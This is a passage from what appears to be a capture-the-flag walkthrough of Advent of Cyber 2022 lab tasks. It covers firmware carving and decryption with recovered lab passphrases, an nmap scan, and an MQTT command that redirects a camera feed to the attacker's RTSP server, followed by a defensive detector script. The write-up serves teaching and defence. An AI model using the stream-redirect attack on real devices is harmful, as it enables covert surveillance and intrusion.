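    return pos + 4 <= len(blob) and blob[pos + 3] & 0xE0 == 0


VALIDATORS = {b"hsqs": valid_squashfs, b"\x1f\x8b\x08": valid_gzip}


def scan(blob: bytes) -> list:
    """Return (offset, description, header_valid) for every magic hit, sorted."""
    hits = []
    for magic, desc in SIGNATURES.items():
        start = 0
        while (pos := blob.find(magic, start)) != -1:
            check = VALIDATORS.get(magic, lambda b, p: True)
            hits.append((pos, desc, check(blob, pos)))
            start = pos + 1
    return sorted(hits)


def carve_gzip(blob: bytes, pos: int) -> bytes:
    """Inflate exactly one gzip member starting at `pos`, ignoring whatever
    follows it in the image (the way an extractor carves embedded data)."""
    inflater = zlib.decompressobj(16 + zlib.MAX_WBITS)
    return inflater.decompress(blob[pos:])


def squashfs_superblock(block_size: int = 131072) -> bytes:
    """A minimal, internally consistent Squashfs v4 superblock (constructed)."""
    block_log = block_size.bit_length() - 1
    return struct.pack("<4sIIIIHHHHHH", b"hsqs", 42, 1_670_000_000, block_size,
                       0, 1, block_log, 0xC0, 1, 4, 0) + b"\x00" * 64


# Constructed firmware-like image: padding, a fake ELF header, release notes
# that happen to contain the Squashfs magic, a gzip member and a superblock.
FIRMWARE = (
    b"\x00" * 64
    + b"\x7fELF\x02\x01\x01" + b"\x00" * 57
    + b"Release notes: the hsqs rootfs is built nightly.\n"
    + gzip.compress(b"kernel version 2.6.31 (constructed)\n", mtime=0)
    + b"\x00" * 16
    + squashfs_superblock()
)


if __name__ == "__main__":
    for offset, desc, ok in scan(FIRMWARE):
        print(f"{offset:>8}  {desc}{'' if ok else '  (header check failed)'}")
        if desc.startswith("gzip") and ok:
            print("          carved:", carve_gzip(FIRMWARE, offset))
```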
Open the Machine’s Split View
cd bin
binwalk -E -N firmwarev2.2-encrypted.gpg
cd ..
cd bin-unsigned/
extract-firmware.sh firmwarev1.0-unsigned
Password: Santa1010
grep -ir paraphrase
cat fmk/rootfs/gpg/secret.txt
Passphrase: Santa@2022
gpg --import fmk/rootfs/gpg/private.key
Type the passphrase that we found
gpg --import fmk/rootfs/gpg/public.key
gpg --list-secret-keys
Once the keys are imported, McSkidy decrypts the firmware using the gpg command. Again change the directory by entering the command cd .. and then cd bin
cd ..
cd bin
gpg firmwarev2.2-encrypted.gpg
cat ~/bin/fmk/rootfs/flag.txt
Ans: THM{WE_GOT_THE_FIRMWARE_CODE}
Ans: Santa@2022
Use the command below to find the version in the rootfs
Make sure you are in the rootfs directory
ls -lah * | grep rootfs
Ans: 2.6.31
Use AttackBox for Exploitation
First of all, let's perform an Nmap scan
nmap -p- 10.10.150.215 -vv -sV -sC --min-rate 1500
Output:
┌──(cyberw1ng㉿root)-[~]
└─$ nmap -p- 10.10.150.215 -vv -sV -sC --min-rate 1500
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-21 11:06 IST
Scanning 10.10.150.215 [2 ports]
Scanning 10.10.150.215 (10.10.150.215) [65535 ports]
Discovered open port 22/tcp on 10.10.150.215
Discovered open port 80/tcp on 10.10.150.215
Discovered open port 1883/tcp on 10.10.150.215
Not shown: 65532 closed tcp ports (conn-refused)
PORT     STATE SERVICE   REASON  VERSION
22/tcp   open  ssh       syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 17e553cf2a0ebe5b6af0233dacdc07f3 (RSA)
|   256 032ef2d20c95e3d97eeca0aa7ba16cd0 (ECDSA)
|_  256 2e90c7317e62d51e89f1544597290ad6 (ED25519)
80/tcp   open  http      syn-ack WebSockify Python/3.8.10
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 405 Method Not Allowed
|     Server: WebSockify Python/3.8.10
|     Date: Thu, 22 Dec 2022 05:37:24 GMT
|     Connection: close
|     Content-Type: text/html;charset=utf-8
|     Content-Length: 472
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 405</p>
|     <p>Message: Method Not Allowed.</p>
|     <p>Error code explanation: 405 - Specified method is invalid for this resource.</p>
|     </body>
|     </html>
|   HTTPOptions: 
|     HTTP/1.1 501 Unsupported method ('OPTIONS')
|     Server: WebSockify Python/3.8.10
|     Date: Thu, 22 Dec 2022 05:37:25 GMT
|     Connection: close
|     Content-Type: text/html;charset=utf-8
|     Content-Length: 500
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 501</p>
|     <p>Message: Unsupported method ('OPTIONS').</p>
|     <p>Error code explanation: HTTPStatus.NOT_IMPLEMENTED - Server does not support this operation.</p>
|     </body>
|_    </html>
|_http-title: Error response
|_http-server-header: WebSockify Python/3.8.10
1883/tcp open  mosquitto version 1.6.9 syn-ack
| mqtt-subscribe: 
|   Topics and their most recent payloads: 
|     $SYS/broker/clients/total: 4
|     $SYS/broker/clients/active: 4
|     $SYS/broker/load/publish/received/15min: 2.03
|     $SYS/broker/load/sockets/5min: 0.88
|     $SYS/broker/load/bytes/received/1min: 276.74
|     $SYS/broker/store/messages/bytes: 180
|     $SYS/broker/publish/messages/sent: 70
|     $SYS/broker/load/connections/15min: 0.32
|     $SYS/broker/uptime: 374 seconds
|     $SYS/broker/publish/messages/received: 37
|     $SYS/broker/bytes/sent: 2735
|     $SYS/broker/load/publish/sent/15min: 4.21
|     $SYS/broker/load/bytes/sent/1min: 1482.40
|     $SYS/broker/publish/bytes/received: 740
|     $SYS/broker/heap/maximum: 57352
|     $SYS/broker/clients/connected: 4
|     $SYS/broker/load/publish/received/1min: 6.19
|     $SYS/broker/publish/bytes/sent: 897
|     $SYS/broker/load/messages/sent/1min: 42.00
|     $SYS/broker/load/connections/5min: 0.65
|     $SYS/broker/version: mosquitto version 1.6.9
|     $SYS/broker/load/bytes/sent/15min: 165.49
|     $SYS/broker/store/messages/count: 39
|     $SYS/broker/subscriptions/count: 4
|     $SYS/broker/retained messages/count: 42
|     $SYS/broker/load/bytes/received/15min: 83.09
|     $SYS/broker/load/sockets/15min: 0.43
|     $SYS/broker/load/publish/sent/5min: 10.76
|     #device/init: FFISRRN3EAJUZSUVK1QB
|     $SYS/broker/load/messages/received/15min: 3.46
|     $SYS/broker/load/messages/received/5min: 7.36
|     $SYS/broker/messages/received: 63
|     $SYS/broker/messages/sent: 96
|     $SYS/broker/clients/maximum: 4
|     $SYS/broker/bytes/received: 1521
|     $SYS/broker/heap/current: 56872
|     $SYS/broker/load/bytes/received/5min: 175.57
|     $SYS/broker/load/connections/1min: 1.26
|     $SYS/broker/load/sockets/1min: 1.41
|     $SYS/broker/load/publish/sent/1min: 36.35
|     $SYS/broker/load/messages/sent/15min: 5.64
|     $SYS/broker/messages/stored: 39
|     $SYS/broker/load/messages/sent/5min: 13.84
|     $SYS/broker/load/messages/received/1min: 11.85
|     $SYS/broker/load/publish/received/5min: 4.28
|_    $SYS/broker/load/bytes/sent/5min: 426.78
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Ans: 1883
I highlighted the line that enumerates the device/init topic, which carries the device ID.
If you cannot see that enumeration in your scan, run the following command:
nmap -sC -sV -p- <Target IP> -vv --min-rate 1500
Ans: y
Ans: 1.6.9
If you need mosquitto_sub, you can install it with the command below, but the AttackBox already has the Mosquitto clients installed:
sudo apt install mosquitto-clients
2. Let's start the RTSP server with Docker:
sudo docker run --rm -it --network=host aler9/rtsp-simple-server
$ sudo docker run --rm -it --network=host aler9/rtsp-simple-server
Unable to find image 'aler9/rtsp-simple-server:latest' locally
latest: Pulling from aler9/rtsp-simple-server
d7c47958dda1: Pull complete
Digest: sha256:44ce06f758a74f316ae4d912706c5212af2fb4765137e119ff689c5ec327dc94
Status: Downloaded newer image for aler9/rtsp-simple-server:latest
2022/12/22 06:06:45 INF rtsp-simple-server v0.21.0
2022/12/22 06:06:45 INF [RTSP] listener opened on :8554 (TCP), :8000 (UDP/RTP), :8001 (UDP/RTCP)
2022/12/22 06:06:45 INF [RTMP] listener opened on :1935
2022/12/22 06:06:45 INF [HLS] listener opened on :8888
2022/12/22 06:06:45 INF [WebRTC] listener opened on :8889
3. Now publish the payload with the following command (the JSON is single-quoted so the shell passes the inner double quotes through intact):
mosquitto_pub -h <THM-Machine-IP> -t device/<Device-ID>/cmd -m '{"cmd":"10","url":"rtsp://<Your_Machine-IP>:8554/abcdefghijk"}'
4. You can view what is being sent to the server by opening the locally hosted RTSP server's path in VLC:
vlc rtsp://127.0.0.1:8554/abcdefghijk
Ans: THM{UR_CAMERA_IS_MINE}
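From the defender's side, the same device/<id>/cmd traffic is what a SOC would watch. The following is an added example, not code from the room or this writeup: it parses command payloads from a constructed list of MQTT messages and flags a cmd "10" whose RTSP url points outside an assumed allowlist of media hosts (the allowlist and the 198.51.100.7 address are made up for the demo).

```python
import json
from typing import Optional
from urllib.parse import urlparse

# Constructed allowlist of hosts the workshop cameras may stream to.
ALLOWED_STREAM_HOSTS = {"media.internal", "10.10.10.5"}
# cmd "10" is the stream-redirect command used in the walkthrough above.
STREAM_REDIRECT_CMD = "10"


def inspect_cmd_message(topic: str, payload: str) -> Optional[dict]:
    """Return a finding for a suspicious device/<id>/cmd message, else None."""
    parts = topic.split("/")
    if len(parts) != 3 or parts[0] != "device" or parts[2] != "cmd":
        return None  # not a command topic
    device_id = parts[1]
    try:
        msg = json.loads(payload)
    except json.JSONDecodeError:
        # Unparseable JSON on a command topic deserves a look on its own
        # (a shell-quoting accident or someone probing the command format).
        return {"device": device_id, "reason": "malformed-json", "payload": payload}
    if not isinstance(msg, dict) or str(msg.get("cmd")) != STREAM_REDIRECT_CMD:
        return None  # some other command; out of scope for this check
    url = str(msg.get("url", ""))
    parsed = urlparse(url)
    if parsed.scheme == "rtsp" and parsed.hostname in ALLOWED_STREAM_HOSTS:
        return None  # redirect to an approved media server
    return {"device": device_id, "reason": "stream-redirect-to-unapproved-host", "url": url}


# Constructed sample of what a subscriber on device/# might observe: the device
# ID is the one from the nmap output, 198.51.100.7 is a documentation address.
SAMPLE_MESSAGES = [
    ("device/init", "FFISRRN3EAJUZSUVK1QB"),
    ("device/FFISRRN3EAJUZSUVK1QB/cmd",
     '{"cmd":"10","url":"rtsp://media.internal:8554/lobby"}'),
    ("device/FFISRRN3EAJUZSUVK1QB/cmd",
     '{"cmd":"10","url":"rtsp://198.51.100.7:8554/abcdefghijk"}'),
    ("device/FFISRRN3EAJUZSUVK1QB/cmd",
     '{cmd:10,url:rtsp://198.51.100.7:8554/abcdefghijk}'),
]


def scan(messages) -> list:
    """Run the inspector over (topic, payload) pairs and keep only the findings."""
    return [f for f in (inspect_cmd_message(t, p) for t, p in messages) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_MESSAGES):
        print(finding)
```

Feeding real traffic in is a matter of wiring an MQTT subscriber on device/# to inspect_cmd_message; the allowlist is the control that distinguishes a legitimate stream change from a redirect to a stranger's RTSP server.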
An attack vector is a tool, technique, or method used to attack a computer system or network. If we map attack vectors to the physical world, they would be the weapons an adversary uses, like swords, arrows, hammers, etc. A non-exhaustive list of examples of attack vectors in cybersecurity includes the following:
The attack surface is the area of the victim that an attack vector can reach and damage. Carrying the physical-world example forward, the attack surface would be the unarmoured body of a soldier, which a sword, an arrow, or a hammer can damage. In cybersecurity, the attack surface will generally contain the following:
Ans: THM{4TT4CK SURF4C3 R3DUC3D}
THM{AoC2022!thank_you!}
Ah, what a month! As McSkidy watched Santa’s sleigh take off, loaded with gifts, she sighed with relief.
We did it!
Looking around the workshop, she could see Santa’s SOC Team working on their tasks.
Some were setting up additional defenses, some were implementing new security policies,
and some were trying out new skills (and hats!) too.
There are some things McSkidy can’t see, but would be vital for you to know.
The Bandit Yeti has left the area and returned to his lair, defeated for now.
If we could look inside his planning room, we’d see the beginnings
of a new scheme, but let’s not worry about that today!
As McSkidy returned to her office, she looked at her desk,
where just 24 days ago, an evil-looking card was placed.
Now that spot was occupied by a scroll with a massive security to-do list.
They all worked hard to clear as many items as possible, but many remain.
Security is never done!
However, with Santa in the air, she could cross “Save Christmas” off the list. Success!
McSkidy and all the Elves from Santa’s Security Team thank you for your help this year.
They promised to call you if they get into trouble in 2023!